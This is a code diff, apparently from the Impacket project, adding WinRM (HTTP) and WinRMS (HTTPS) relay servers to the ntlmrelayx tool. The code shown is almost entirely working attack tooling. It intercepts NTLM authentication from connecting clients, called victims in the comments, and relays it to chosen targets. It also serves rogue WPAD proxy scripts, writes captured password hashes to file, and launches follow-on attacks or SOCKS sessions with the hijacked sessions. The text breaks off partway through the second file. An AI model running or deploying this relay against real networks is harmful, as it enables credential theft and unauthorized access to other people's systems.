+        def send_error(self, code, message=None):
+            if message.find('RPC_OUT') >=0 or message.find('RPC_IN'):
+                LOG.info('WinRM(%s): send_error path: %s' % (self.server.server_address[1], self.path.lower()))
+                return self.do_GET()
+            return http.server.SimpleHTTPRequestHandler.send_error(self,code,message)
+
+        def send_not_found(self):
+            self.send_response(404)
+            self.send_header('WWW-Authenticate', 'Negotiate')
+            self.send_header('Content-type', 'text/html')
+            self.send_header('Content-Length', '0')
+            self.send_header('Connection', 'close')
+            self.end_headers()
+
+        def send_multi_status(self, content):
+            self.send_response(207, "Multi-Status")
+            self.send_header('Content-Type', 'application/xml')
+            self.send_header('Content-Length', str(len(content)))
+            self.send_header('Connection', 'close')
+            self.end_headers()
+            self.wfile.write(content)
+
+        def serve_wpad(self):
+            wpadResponse = self.wpad % (self.server.config.wpad_host, self.server.config.wpad_host)
+            self.send_response(200)
+            self.send_header('Content-type', 'application/x-ns-proxy-autoconfig')
+            self.send_header('Content-Length',len(wpadResponse))
+            self.end_headers()
+            self.wfile.write(b(wpadResponse))
+            return
+
+        def should_serve_wpad(self, client):
+            # If the client was already prompted for authentication, see how many times this happened
+            try:
+                num = self.server.wpad_counters[client]
+            except KeyError:
+                num = 0
+            self.server.wpad_counters[client] = num + 1
+            # Serve WPAD if we passed the authentication offer threshold
+            if num >= self.server.config.wpad_auth_num:
+                return True
+            else:
+                return False
+
+        def serve_image(self):
+            with open(self.server.config.serve_image, 'rb') as imgFile:
+                imgFile_data = imgFile.read()
+                self.send_response(200, "OK")
+                self.send_header('Content-type', 'image/jpeg')
+                self.send_header('Content-Length', str(len(imgFile_data)))
+                self.end_headers()
+                self.wfile.write(imgFile_data)
+
+        def strip_blob(self, proxy):
+            if PY2:
+                if proxy:
+                    proxyAuthHeader = self.headers.getheader('Proxy-Authorization')
+                else:
+                    autorizationHeader = self.headers.getheader('Authorization')
+            else:
+                if proxy:
+                    proxyAuthHeader = self.headers.get('Proxy-Authorization')
+                else:
+                    autorizationHeader = self.headers.get('Authorization')
+
+            if (proxy and proxyAuthHeader is None) or (not proxy and autorizationHeader is None):
+                self.do_AUTHHEAD(message = b'NTLM',proxy=proxy)
+                messageType = 0
+                token = None
+            else:
+                if proxy:
+                    typeX = proxyAuthHeader
+                else:
+                    typeX = autorizationHeader
+                try:
+                    _, blob = typeX.split('NTLM')
+                    token = base64.b64decode(blob.strip())
+                except Exception:
+                    LOG.debug("Exception:", exc_info=True)
+                    self.do_AUTHHEAD(message = b'NTLM', proxy=proxy)
+                else:
+                    messageType = struct.unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
+
+            return token, messageType
+
+        def do_HEAD(self):
+            self.send_response(200)
+            self.send_header('Content-type', 'text/html')
+            self.end_headers()
+
+        def do_OPTIONS(self):
+            self.send_response(200)
+            self.send_header('Allow',
+                             'GET, HEAD, POST, PUT, DELETE, OPTIONS, PROPFIND, PROPPATCH, MKCOL, LOCK, UNLOCK, MOVE, COPY')
+            self.send_header('Content-Length', '0')
+            self.send_header('Connection', 'close')
+            self.end_headers()
+            return
+
+        def do_PROPFIND(self):
+            proxy = False
+            if (".jpg" in self.path) or (".JPG" in self.path):
+                content = b"""<?xml version="1.0"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>http://webdavrelay/file/image.JPG/</D:href><D:propstat><D:prop><D:creationdate>2016-11-12T22:00:22Z</D:creationdate><D:displayname>image.JPG</D:displayname><D:getcontentlength>4456</D:getcontentlength><D:getcontenttype>image/jpeg</D:getcontenttype><D:getetag>4ebabfcee4364434dacb043986abfffe</D:getetag><D:getlastmodified>Mon, 20 Mar 2017 00:00:22 GMT</D:getlastmodified><D:resourcetype></D:resourcetype><D:supportedlock></D:supportedlock><D:ishidden>0</D:ishidden></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>"""
+            else:
+                content = b"""<?xml version="1.0"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>http://webdavrelay/file/</D:href><D:propstat><D:prop><D:creationdate>2016-11-12T22:00:22Z</D:creationdate><D:displayname>a</D:displayname><D:getcontentlength></D:getcontentlength><D:getcontenttype></D:getcontenttype><D:getetag></D:getetag><D:getlastmodified>Mon, 20 Mar 2017 00:00:22 GMT</D:getlastmodified><D:resourcetype><D:collection></D:collection></D:resourcetype><D:supportedlock></D:supportedlock><D:ishidden>0</D:ishidden></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>"""
+
+            token, messageType = self.strip_blob(proxy)
+
+            # Should we relay or -in locally?
+            if self.relayToHost is False and not self.server.config.disableMulti:
+                self.do_local_auth(messageType, token, proxy)
+                return
+            else:
+                # We can start the relay process
+                self.do_relay(messageType, token, proxy, content)
+
+        def do_AUTHHEAD(self, message = b'', proxy=False):
+            if proxy:
+                self.send_response(407)
+                self.send_header('Proxy-Authenticate', message.decode('utf-8'))
+            else:
+                self.send_response(401)
+                self.send_header('WWW-Authenticate', message.decode('utf-8'))
+            self.send_header('Content-type', 'text/html')
+            self.send_header('Content-Length','0')
+            self.send_header('Connection', 'keep-alive')
+            self.end_headers()
+
+        #Trickery to relay the victim to all the targets we want
+        def do_REDIRECT(self, proxy=False):
+            rstr = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10))
+            self.send_response(307)
+            if proxy:
+                self.send_header('Proxy-Authenticate', 'NTLM')
+            else:
+                self.send_header('WWW-Authenticate', 'Negotiate')
+            self.send_header('Content-type', 'text/html')
+            self.send_header('Connection','keep-alive')
+            self.send_header('Location','/%s' % rstr)
+            self.send_header('Content-Length','0')
+            self.end_headers()
+
+        def do_SMBREDIRECT(self):
+            self.send_response(302)
+            self.send_header('Content-type', 'text/html')
+            self.send_header('Location','file://%s' % self.server.config.redirecthost)
+            self.send_header('Content-Length','0')
+            self.send_header('Connection','close')
+            self.end_headers()
+
+        def do_GET(self):
+            return self.do_GETPOST()
+
+        def do_POST(self):
+            return self.do_GETPOST()
+
+        def do_CONNECT(self):
+            # Client is using our server as a Proxy
+            proxy = True
+            token, messageType = self.strip_blob(proxy)
+
+            # We can't do the multirelay trick so we just relay the connection
+            self.do_relay(messageType, token, proxy)
+            return
+
+        def do_GETPOST(self):
+
+            if self.command == 'POST' and "/wsman" in self.path.lower():
+                content_length = int(self.headers.get('Content-Length', 0))
+                self.rfile.read(content_length)
+            else:
+                LOG.info('WinRM(%s): Client requested path: %s' % (self.server.server_address[1], self.path.lower()))
+                self.send_not_found()
+                return
+
+            # Determine if the user is connecting to our server directly or attempts to use it as a proxy
+            if len(self.path) > 4 and self.path[:4].lower() == 'http':
+                proxy = True
+            else:
+                proxy = False
+
+            token, messageType = self.strip_blob(proxy)
+
+            # Should we relay or log-in locally?
+            if self.relayToHost is False and not self.server.config.disableMulti:
+                self.do_local_auth(messageType, token, proxy)
+                return
+            else:
+                self.do_relay(messageType, token, proxy)
+
+            return
+
+        def do_ntlm_negotiate(self, token, proxy):
+            if self.target.scheme.upper() in self.server.config.protocolClients:
+                self.client = self.server.config.protocolClients[self.target.scheme.upper()](self.server.config, self.target)
+                # If connection failed, return
+                if not self.client.initConnection():
+                    return False
+
+                if self.negotiation_count > 1:
+                  return False 
+
+                self.negotiation_count += 1
+
+                self.challengeMessage = self.client.sendNegotiate(token)
+
+                # Remove target NetBIOS field from the NTLMSSP_CHALLENGE
+                if self.server.config.remove_target:
+                    av_pairs = ntlm.AV_PAIRS(self.challengeMessage['TargetInfoFields'])
+                    del av_pairs[ntlm.NTLMSSP_AV_HOSTNAME]
+                    self.challengeMessage['TargetInfoFields'] = av_pairs.getData()
+                    self.challengeMessage['TargetInfoFields_len'] = len(av_pairs.getData())
+                    self.challengeMessage['TargetInfoFields_max_len'] = len(av_pairs.getData())
+
+                # Check for errors
+                if self.challengeMessage is False:
+                    return False
+            else:
+                LOG.error('Protocol Client for %s not found!' % self.target.scheme.upper())
+                return False
+
+            # Calculate auth
+            self.do_AUTHHEAD(message = b'NTLM '+base64.b64encode(self.challengeMessage.getData()), proxy=proxy)
+            return True
+
+        def do_ntlm_auth(self,token,authenticateMessage):
+            if authenticateMessage['user_name'] != '' or self.target.hostname == '127.0.0.1':
+                clientResponse, errorCode = self.client.sendAuth(token)
+            else:
+                # Anonymous login, send STATUS_ACCESS_DENIED so we force the client to send his credentials, except
+                # when coming from localhost
+                errorCode = STATUS_ACCESS_DENIED
+
+            if errorCode == STATUS_SUCCESS:
+                return True
+
+            return False
+
+        def do_local_auth(self, messageType, token, proxy):
+            if messageType == 1:
+                negotiateMessage = ntlm.NTLMAuthNegotiate()
+                negotiateMessage.fromString(token)
+                ansFlags = 0
+
+                if negotiateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_56:
+                    ansFlags |= ntlm.NTLMSSP_NEGOTIATE_56
+                if negotiateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_128:
+                    ansFlags |= ntlm.NTLMSSP_NEGOTIATE_128
+                if negotiateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH:
+                    ansFlags |= ntlm.NTLMSSP_NEGOTIATE_KEY_EXCH
+                if negotiateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY:
+                    ansFlags |= ntlm.NTLMSSP_NEGOTIATE_EXTENDED_SESSIONSECURITY
+                if negotiateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE:
+                    ansFlags |= ntlm.NTLMSSP_NEGOTIATE_UNICODE
+                if negotiateMessage['flags'] & ntlm.NTLM_NEGOTIATE_OEM:
+                    ansFlags |= ntlm.NTLM_NEGOTIATE_OEM
+
+                ansFlags |= ntlm.NTLMSSP_NEGOTIATE_VERSION | ntlm.NTLMSSP_NEGOTIATE_TARGET_INFO | \
+                            ntlm.NTLMSSP_TARGET_TYPE_SERVER | ntlm.NTLMSSP_NEGOTIATE_NTLM
+
+                challengeMessage = ntlm.NTLMAuthChallenge()
+                challengeMessage['flags'] = ansFlags
+                challengeMessage['domain_name'] = ""
+                challengeMessage['challenge'] = ''.join(random.choice(string.printable) for _ in range(64))
+                challengeMessage['TargetInfoFields'] = ntlm.AV_PAIRS()
+                challengeMessage['TargetInfoFields_len'] = 0
+                challengeMessage['TargetInfoFields_max_len'] = 0
+                challengeMessage['TargetInfoFields_offset'] = 40 + 16
+                challengeMessage['Version'] = b'\xff' * 8
+                challengeMessage['VersionLen'] = 8
+
+                self.do_AUTHHEAD(message=b'Negotiate ' + base64.b64encode(challengeMessage.getData()),proxy=proxy)
+                return
+
+            elif messageType == 3:
+                authenticateMessage = ntlm.NTLMAuthChallengeResponse()
+                authenticateMessage.fromString(token)
+                LOG.info(authenticateMessage)
+                if authenticateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE:
+                    self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'),
+                                                authenticateMessage['user_name'].decode('utf-16le'))).upper()
+                else:
+                    self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('ascii'),
+                                                authenticateMessage['user_name'].decode('ascii'))).upper()
+
+                self.target = self.server.config.target.getTarget(identity = self.authUser)
+                if self.target is None:
+                    LOG.info("WinRM(%s): Connection from %s@%s controlled, but there are no more targets left!" %
+                        (self.server.server_address[1], self.authUser, self.client_address[0]))
+                    self.send_not_found()
+                    return
+
+                LOG.info("WinRM(%s): Connection from %s@%s controlled, attacking target %s://%s" % (self.server.server_address[1],
+                    self.authUser, self.client_address[0], self.target.scheme, self.target.netloc))
+
+                self.relayToHost = True
+                self.do_REDIRECT()
+
+        def do_relay(self, messageType, token, proxy, content = None):
+            if messageType == 1:
+                if self.server.config.disableMulti:
+                    self.target = self.server.config.target.getTarget(multiRelay=False)
+                    if self.target is None:
+                        LOG.info("WinRM(%s): Connection from %s controlled, but there are no more targets left!" % (
+                            self.server.server_address[1], self.client_address[0]))
+                        self.send_not_found()
+                        return
+
+                    LOG.info("WinRM(%s): Connection from %s controlled, attacking target %s://%s" % (
+                        self.server.server_address[1], self.client_address[0], self.target.scheme, self.target.netloc))
+
+                if not self.do_ntlm_negotiate(token, proxy=proxy):
+                    # Connection failed
+                    if self.server.config.disableMulti:
+                        LOG.error('WinRM(%s): Negotiating NTLM with %s://%s failed' % (self.server.server_address[1],
+                                  self.target.scheme, self.target.netloc))
+                        self.send_not_found()
+                        return
+                    else:
+                        LOG.error('WinRM(%s): Negotiating NTLM with %s://%s failed. Skipping to next target' % (
+                            self.server.server_address[1], self.target.scheme, self.target.netloc))
+
+                        self.target = self.server.config.target.getTarget(identity=self.authUser)
+
+                        if self.target is None:
+                            LOG.info( "WinRM(%s): Connection from %s@%s controlled, but there are no more targets left!" %
+                                (self.server.server_address[1], self.authUser, self.client_address[0]))
+                            self.send_not_found()
+                            return
+
+                        LOG.info("WinRM(%s): Connection from %s@%s controlled, attacking target %s://%s" % (self.server.server_address[1],
+                            self.authUser, self.client_address[0], self.target.scheme, self.target.netloc))
+
+                        self.do_REDIRECT()
+
+            elif messageType == 3:
+                authenticateMessage = ntlm.NTLMAuthChallengeResponse()
+                authenticateMessage.fromString(token)
+
+                if self.server.config.disableMulti:
+                    if authenticateMessage['flags'] & ntlm.NTLMSSP_NEGOTIATE_UNICODE:
+                        self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('utf-16le'),
+                                                    authenticateMessage['user_name'].decode('utf-16le'))).upper()
+                    else:
+                        self.authUser = ('%s/%s' % (authenticateMessage['domain_name'].decode('ascii'),
+                                                    authenticateMessage['user_name'].decode('ascii'))).upper()
+
+                    target = '%s://%s@%s' % (self.target.scheme, self.authUser.replace("/", '\\'), self.target.netloc)
+
+                if not self.do_ntlm_auth(token, authenticateMessage):
+                    LOG.error("Authenticating against %s://%s as %s FAILED" % (self.target.scheme, self.target.netloc,
+                                                                               self.authUser))
+                    if self.server.config.disableMulti:
+                        self.send_not_found()
+                        return
+                    # Only skip to next if the login actually failed, not if it was just anonymous login or a system account
+                    # which we don't want
+                    if authenticateMessage['user_name'] != '':  # and authenticateMessage['user_name'][-1] != '$':
+                        # No anonymous login, go to next host and avoid triggering a popup
+                        self.target = self.server.config.target.getTarget(identity=self.authUser)
+                        if self.target is None:
+                            LOG.info("WinRM(%s): Connection from %s@%s controlled, but there are no more targets left!" %
+                                (self.server.server_address[1], self.authUser, self.client_address[0]))
+                            self.send_not_found()
+                            return
+
+                        LOG.info("WinRM(%s): Connection from %s@%s controlled, attacking target %s://%s" % (self.server.server_address[1],
+                            self.authUser, self.client_address[0], self.target.scheme, self.target.netloc))
+
+                        self.do_REDIRECT()
+                    else:
+                        # If it was an anonymous login, send 401
+                        self.do_AUTHHEAD(b'Negotiate', proxy=proxy)
+                else:
+                    # Relay worked, do whatever we want here...
+                    LOG.info("WinRM(%s): Authenticating against %s://%s as %s SUCCEED" % (self.server.server_address[1],
+                        self.target.scheme, self.target.netloc, self.authUser))
+
+                    ntlm_hash_data = outputToJohnFormat(self.challengeMessage['challenge'],
+                                                        authenticateMessage['user_name'],
+                                                        authenticateMessage['domain_name'],
+                                                        authenticateMessage['lanman'], authenticateMessage['ntlm'])
+                    self.client.sessionData['JOHN_OUTPUT'] = ntlm_hash_data
+
+                    if self.server.config.outputFile is not None:
+                        writeJohnOutputToFile(ntlm_hash_data['hash_string'], ntlm_hash_data['hash_version'],
+                                              self.server.config.outputFile)
+
+                    if self.server.config.dumpHashes is True:
+                        LOG.info(ntlm_hash_data['hash_string'])
+
+                    self.do_attack()
+
+                    if self.server.config.disableMulti:
+                        # We won't use the redirect trick, closing connection...
+                        if self.command == "PROPFIND":
+                            self.send_multi_status(content)
+                        else:
+                            self.send_not_found()
+                        return
+                    else:
+                        # Let's grab our next target
+                        self.target = self.server.config.target.getTarget(identity=self.authUser)
+
+                        if self.target is None:
+                            LOG.info("WinRM(%s): Connection from %s@%s controlled, but there are no more targets left!" % (
+                                self.server.server_address[1], self.authUser, self.client_address[0]))
+
+                            # Return Multi-Status status code to WebDAV servers
+                            if self.command == "PROPFIND":
+                                self.send_multi_status(content)
+                                return
+
+                            # Serve image and return 200 if --serve-image option has been set by user
+                            if (self.server.config.serve_image):
+                                self.serve_image()
+                                return
+
+                            # And answer 404 not found
+                            self.send_not_found()
+                            return
+
+                        # We have the next target, let's keep relaying...
+                        LOG.info("WinRM(%s): Connection from %s@%s controlled, attacking target %s://%s" % (self.server.server_address[1],
+                            self.authUser, self.client_address[0], self.target.scheme, self.target.netloc))
+                        self.do_REDIRECT()
+
+        def do_attack(self):
+            # Check if SOCKS is enabled and if we support the target scheme
+            if self.server.config.runSocks and self.target.scheme.upper() in self.server.config.socksServer.supportedSchemes:
+                # Pass all the data to the socksplugins proxy
+                activeConnections.put((self.target.hostname, self.client.targetPort, self.target.scheme.upper(),
+                                       self.authUser, self.client, self.client.sessionData))
+                return
+
+            # If SOCKS is not enabled, or not supported for this scheme, fall back to "classic" attacks
+            if self.target.scheme.upper() in self.server.config.attacks:
+                # We have an attack.. go for it
+                clientThread = self.server.config.attacks[self.target.scheme.upper()](self.server.config, self.client.session,
+                                                                               self.authUser)
+                clientThread.start()
+            else:
+                LOG.error('WinRM(%s): No attack configured for %s' % (self.server.server_address[1], self.target.scheme.upper()))
+
+    def __init__(self, config):
+        Thread.__init__(self)
+        self.daemon = True
+        self.config = config
+        self.server = None
+        self.httpport = None
+
+    def run(self):
+        if not self.config.listeningPort:
+            self.config.listeningPort = 5985
+
+        LOG.info("Setting up WinRM (HTTP) Server on port %s" % self.config.listeningPort)
+
+        # changed to read from the interfaceIP set in the configuration
+        self.server = self.HTTPServer((self.config.interfaceIp, self.config.listeningPort), self.HTTPHandler, self.config)
+
+        try:
+             self.server.serve_forever()
+        except KeyboardInterrupt:
+             pass
+        LOG.info('Shutting down WinRM (HTTP) Server')
+        self.server.server_close()

--- a/impacket/examples/ntlmrelayx/servers/winrmsrelayserver.py
+++ b/impacket/examples/ntlmrelayx/servers/winrmsrelayserver.py
@@ -1,0 +1,575 @@
+# Impacket - Collection of Python classes for working with network protocols.
+#
+# Copyright (C) 2022 Fortra. All rights reserved.
+#
+# This software is provided under a slightly modified version
+# of the Apache Software License. See the accompanying LICENSE file
+# for more information.
+#
+# Description:
+#   WinRM (HTTPS) Relay Server
+#
+#   This is the WinRM (HTTPS) server which relays the NTLMSSP  messages to other protocols
+#
+# Authors:
+#   Joe Mondloch (jmk@foofus.net)
+#   Aurélien Chalot (@Defte_)
+
+import ssl
+import http.server
+import socketserver
+import socket
+import base64
+import random
+import struct
+import string
+from threading import Thread
+from six import PY2, b
+import tempfile
+from OpenSSL import crypto
+
+from impacket import ntlm, LOG
+from impacket.smbserver import outputToJohnFormat, writeJohnOutputToFile
+from impacket.nt_errors import STATUS_ACCESS_DENIED, STATUS_SUCCESS
+from impacket.examples.ntlmrelayx.utils.targetsutils import TargetsProcessor
+from impacket.examples.ntlmrelayx.servers.socksserver import activeConnections
+
+class WinRMSRelayServer(Thread):
+
+    class HTTPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
+        def __init__(self, server_address, RequestHandlerClass, config):
+            self.config = config
+            self.daemon_threads = True
+            if self.config.ipv6:
+                self.address_family = socket.AF_INET6
+            self.wpad_counters = {}
+
+            socketserver.TCPServer.__init__(self, server_address, RequestHandlerClass)
+
+            key = crypto.PKey()
+            key.generate_key(crypto.TYPE_RSA, 2048)
+            cert = crypto.X509()
+            cert.get_subject().CN = "localhost"
+            cert.set_serial_number(random.randint(0, 100000))
+            cert.gmtime_adj_notBefore(0)
+            cert.gmtime_adj_notAfter(10 * 365 * 24 * 60 * 60)
+            cert.set_issuer(cert.get_subject())
+            cert.set_pubkey(key)
+            cert.sign(key, "sha256")
+
+            cert_file = tempfile.NamedTemporaryFile(delete=False)
+            key_file = tempfile.NamedTemporaryFile(delete=False)
+            cert_file.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
+            key_file.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, key))
+            cert_file.close()
+            key_file.close()
+
+            context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
+            context.load_cert_chain(certfile=cert_file.name, keyfile=key_file.name)
+
+            self.ssl_context = context
+            self.socket = context.wrap_socket(self.socket, server_side=True)
+
+    class HTTPHandler(http.server.SimpleHTTPRequestHandler):
+        def __init__(self,request, client_address, server):
+            self.tls_context = server.ssl_context
+
+            self.server_version = "Microsoft-HTTPAPI/2.0"
+            self.sys_version = ""
+            self.server = server
+            self.protocol_version = "HTTP/1.1"
+            self.challengeMessage = None
+            self.target = None
+            self.client = None
+            self.machineAccount = None
+            self.machineHashes = None
+            self.domainIp = None
+            self.authUser = None
+            self.relayToHost = False
+            self.isFirstNeg = True
+            self.negotiation_count = 0 
+            self.wpad = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||' \
+                        '(host == "127.0.0.1")) return "DIRECT"; if (dnsDomainIs(host, "%s")) return "DIRECT"; ' \
+                        'return "PROXY %s:80; DIRECT";} '
+            if self.server.config.mode != 'REDIRECT':
+                if self.server.config.target is None:
+                    # Reflection mode, defaults to SMB at the target, for now
+                    self.server.config.target = TargetsProcessor(singleTarget='SMB://%s:445/' % client_address[0])
+            try:
+                http.server.SimpleHTTPRequestHandler.__init__(self,request, client_address, server)
+            except Exception as e:
+                LOG.debug("Exception:", exc_info=True)
+                LOG.error(str(e))
+
+        def handle_one_request(self):
+            try:
+                http.server.SimpleHTTPRequestHandler.handle_one_request(self)
+            except KeyboardInterrupt:
+                raise
+            except Exception as e:
+                LOG.debug("WinRMS(%s): Exception:" % self.server.server_address[1], exc_info=True)
+
+        def log_message(self, format, *args):
+            return
+
+        def send_error(self, code, message=None):
+            if message.find('RPC_OUT') >= 0 or message.find('RPC_IN'):
+                LOG.info('WinRMS(%s): send_error path: %s' % (self.server.server_address[1], self.path.lower()))
+                return self.do_GET()
+            return http.server.SimpleHTTPRequestHandler.send_error(self, code, message)
+
+        def send_not_found(self):
+            self.send_response(404)
+            self.send_header('WWW-Authenticate', 'Negotiate')
+            self.send_header('Content-type', 'text/html')
+            self.send_header('Content-Length', '0')
+            self.send_header('Connection', 'close')
+            self.end_headers()
+
+        def send_multi_status(self, content):
+            self.send_response(207, "Multi-Status")
+            self.send_header('Content-Type', 'application/xml')
+            self.send_header('Content-Length', str(len(content)))
+            self.send_header('Connection', 'close')
+            self.end_headers()
+            self.wfile.write(content)
+
+        def serve_wpad(self):
+            wpadResponse = self.wpad % (self.server.config.wpad_host, self.server.config.wpad_host)
+            self.send_response(200)
+            self.send_header('Content-type', 'application/x-ns-proxy-autoconfig')
+            self.send_header('Content-Length',len(wpadResponse))
+            self.end_headers()
+            self.wfile.write(b(wpadResponse))
+            return
+
+        def should_serve_wpad(self, client):
+            # If the client was already prompted for authentication, see how many times this happened
+            try:
+                num = self.server.wpad_counters[client]
+            except KeyError:
+                num = 0
+            self.server.wpad_counters[client] = num + 1
+            # Serve WPAD if we passed the authentication offer threshold
+            if num >= self.server.config.wpad_auth_num:
+                return True
+            else:
+                return False
+
+        def serve_image(self):
+            with open(self.server.config.serve_image, 'rb') as imgFile:
+                imgFile_data = imgFile.read()
+                self.send_response(200, "OK")
+                self.send_header('Content-type', 'image/jpeg')
+                self.send_header('Content-Length', str(len(imgFile_data)))
+                self.end_headers()
+                self.wfile.write(imgFile_data)
+
+        def strip_blob(self, proxy):
+            if PY2:
+                if proxy:
+                    proxyAuthHeader = self.headers.getheader('Proxy-Authorization')
+                else:
+                    autorizationHeader = self.headers.getheader('Authorization')
+            else:
+                if proxy:
+                    proxyAuthHeader = self.headers.get('Proxy-Authorization')
+                else:
+                    autorizationHeader = self.headers.get('Authorization')
+
+            if (proxy and proxyAuthHeader is None) or (not proxy and autorizationHeader is None):
+                self.do_AUTHHEAD(message = b'NTLM',proxy=proxy)
+                messageType = 0
+                token = None
+            else:
+                if proxy:
+                    typeX = proxyAuthHeader
+                else:
+                    typeX = autorizationHeader
+                try:
+                    _, blob = typeX.split('NTLM')
+                    token = base64.b64decode(blob.strip())
+                except Exception:
+                    LOG.debug("Exception:", exc_info=True)
+                    self.do_AUTHHEAD(message = b'NTLM', proxy=proxy)
+                else:
+                    messageType = struct.unpack('<L',token[len('NTLMSSP\x00'):len('NTLMSSP\x00')+4])[0]
+
+            return token, messageType
+
+        def do_HEAD(self):
+            self.send_response(200)
+            self.send_header('Content-type', 'text/html')
+            self.end_headers()
+
+        def do_OPTIONS(self):
+            self.send_response(200)
+            self.send_header('Allow',
+                             'GET, HEAD, POST, PUT, DELETE, OPTIONS, PROPFIND, PROPPATCH, MKCOL, LOCK, UNLOCK, MOVE, COPY')
+            self.send_header('Content-Length', '0')
+            self.send_header('Connection', 'close')
+            self.end_headers()
+            return
+
+        def do_PROPFIND(self):
+            proxy = False
+            if (".jpg" in self.path) or (".JPG" in self.path):
+                content = b"""<?xml version="1.0"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>http://webdavrelay/file/image.JPG/</D:href><D:propstat><D:prop><D:creationdate>2016-11-12T22:00:22Z</D:creationdate><D:displayname>image.JPG</D:displayname><D:getcontentlength>4456</D:getcontentlength><D:getcontenttype>image/jpeg</D:getcontenttype><D:getetag>4ebabfcee4364434dacb043986abfffe</D:getetag><D:getlastmodified>Mon, 20 Mar 2017 00:00:22 GMT</D:getlastmodified><D:resourcetype></D:resourcetype><D:supportedlock></D:supportedlock><D:ishidden>0</D:ishidden></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>"""
+            else:
+                content = b"""<?xml version="1.0"?><D:multistatus xmlns:D="DAV:"><D:response><D:href>http://webdavrelay/file/</D:href><D:propstat><D:prop><D:creationdate>2016-11-12T22:00:22Z</D:creationdate><D:displayname>a</D:displayname><D:getcontentlength></D:getcontentlength><D:getcontenttype></D:getcontenttype><D:getetag></D:getetag><D:getlastmodified>Mon, 20 Mar 2017 00:00:22 GMT</D:getlastmodified><D:resourcetype><D:collection></D:collection></D:resourcetype><D:supportedlock></D:supportedlock><D:ishidden>0</D:ishidden></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>"""
+
+            token, messageType = self.strip_blob(proxy)
+
+            # Should we relay or -in locally?
+            if self.relayToHost is False and not self.server.config.disableMulti:
+                self.do_local_auth(messageType, token, proxy)
+                return
+            else:
+                # We can start the relay process
+                self.do_relay(messageType, token, proxy, content)
+
+        def do_AUTHHEAD(self, message = b'', proxy=False):
+            if proxy:
+                self.send_response(407)
+                self.send_header('Proxy-Authenticate', message.decode('utf-8'))
+            else:
+                self.send_response(401)
+                self.send_header('WWW-Authenticate', message.decode('utf-8'))
+
+            self.send_header('Content-Length','0')
+            self.send_header('Connection', 'keep-alive')
+            self.end_headers()
+
+        #Trickery to relay the victim to all the targets we want
+        def do_REDIRECT(self, proxy=False):
+            rstr = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(10))
+            self.send_response(307)
+            if proxy:
+                self.send_header('Proxy-Authenticate', 'NTLM')
+            else:
+                self.send_header('WWW-Authenticate', 'Negotiate')
+
+            self.send_header('Connection','keep-alive')
+            self.send_header('Location','/%s' % rstr)
+            self.send_header('Content-Length','0')
+            self.end_headers()
+
+        def do_SMBREDIRECT(self):
+            self.send_response(302)
+            self.send_header('Content-type', 'text/html')
+            self.send_header('Location','file://%s' % self.server.config.redirecthost)
+            self.send_header('Content-Length','0')
+            self.send_header('Connection','close')
+            self.end_headers()
+
+        def do_GET(self):
+            return self.do_GETPOST()
+
+        def do_POST(self):
+            return self.do_GETPOST()
+
+        def do_CONNECT(self):
+            # Client is using our server as a Proxy
+            proxy = True
+            token, messageType = self.strip_blob(proxy)
+
+            # We can't do the multirelay trick so we just relay the connection
+            self.do_relay(messageType, token, proxy)
+            return
+
+        def do_GETPOST(self): 
+            if self.command == 'POST' and "/wsman" in self.path.lower():
+                content_length = int(self.headers.get('Content-Length', 0))
+                self.rfile.read(content_length)
+            else:
+                LOG.info('WinRMS(%s): Client requested path: %s' % (self.server.server_address[1], self.path.lower()))
+                self.send_not_found()
+                return
+
+            # Determine if the user is connecting to our server directly or attempts to use it as a proxy
+            if len(self.path) > 4 and self.path[:4].lower() == 'http':
+                proxy = True
+            else:
+                proxy = False
+
+            token, messageType = self.strip_blob(proxy)
+
+            # Should we relay or log-in locally?
+            if self.relayToHost is False and not self.server.config.disableMulti:
+                self.do_local_auth(messageType, token, proxy)
+                return
+            else:
+                self.do_relay(messageType, token, proxy)
+
+            return
+
+        def do_ntlm_negotiate(self, token, proxy):
+            if self.target.scheme.upper() in self.server.config.protocolClients:
+                self.client = self.server.config.protocolClients[self.target.scheme.upper()](self.server.config, self.target)
+                # If connection failed, return
+                if not self.client.initConnection():
+                    return False
+
+                if self.negotiation_count > 1:
+                  return False 
+
+                self.negotiation_count += 1
+
+                self.challengeMessage = self.client.sendNegotiate(token)
+
+                # Remove target NetBIOS field from the NTLMSSP_CHALLENGE
+                if self.server.config.remove_target:
+                    av_pairs = ntlm.AV_PAIRS(self.challengeMessage['TargetInfoFields'])
+                    del av_pairs[ntlm.NTLMSSP_AV_HOSTNAME]
+                    self.challengeMessage['TargetInfoFields'] = av_pairs.getData()
+                    self.challengeMessage['TargetInfoFields_len'] = len(av_pairs.getData())
+                    self.challengeMessage['TargetInfoFields_max_len'] = len(av_pairs.getData())
+
+                # Check for errors
+                if self.challengeMessage is False:
+                    return False
+            else:
+                LOG.error('Protocol Client for %s not found!' % self.target.scheme.upper())
+                return False
+
+            self.do_AUTHHEAD(message = b'NTLM '+base64.b64encode(self.challengeMessage.getData()), proxy=proxy)
+            return True
+
